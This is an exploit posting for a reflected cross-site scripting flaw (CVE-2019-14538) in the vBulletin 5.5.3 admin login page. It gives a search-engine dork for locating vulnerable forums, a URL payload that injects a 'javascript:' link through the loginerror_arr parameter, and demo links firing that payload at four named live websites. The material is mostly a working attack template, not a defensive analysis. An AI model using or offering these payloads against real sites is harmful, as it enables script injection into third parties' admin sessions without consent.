# Exploit Title: vBulletin Reflected XSS via "Click here" # Google Dork: intext : "Powered by vBulletin® Version 5.5.3 Copyright © 2019 MH Sub I, LLC dba vBulletin" # Date: 05/08/2019 # Exploit Author: TrazeR / AKİNCİLAR # Vendor Homepage: https://www.vbulletin.com/ # Software Link: https://www.vbulletin.com/download.php # Version: vBulletin 5.5.3 # Tested on: Windows 10 # CVE : CVE-2019-14538 ################################################################################# Dork: intext : "Powered by vBulletin® Version 5.5.3 Copyright © 2019 MH Sub I, LLC dba vBulletin" vBulletin 5.5.3 Reflected XSS via "Click here" Payload: /admincp/index.php?loginerror_arr[0]=badlogin_strikes_logintypeusername&loginerror_arr[1]=javascript:alert(1923)&loginerror_arr[2]=1&vb_login_username=admin (Click here!) click here xss will work Demo : https://forum.vbulletin.com/admincp/index.php?loginerror_arr[0]=badlogin_strikes_logintypeusername&loginerror_arr[1]=javascript:alert(1923)&loginerror_arr[2]=1&vb_login_username=admin https://www.scootersoftware.com/vbulletin//admincp/index.php?loginerror_arr[0]=badlogin_strikes_logintypeusername&loginerror_arr[1]=javascript:alert(1923)&loginerror_arr[2]=1&vb_login_username=admin https://www.photorials.nl/admincp/index.php?loginerror_arr[0]=badlogin_strikes_logintypeusername&loginerror_arr[1]=javascript:alert(1923)&loginerror_arr[2]=1&vb_login_username=admin https://powerhacker.net/admincp/index.php?loginerror_arr[0]=badlogin_strikes_logintypeusername&loginerror_arr[1]=javascript:alert(1923)&loginerror_arr[2]=1&vb_login_username=admin screenshot: https://imguploads.net/images/2019/08/25/vbulletin-xss-trazer.png #################################################################################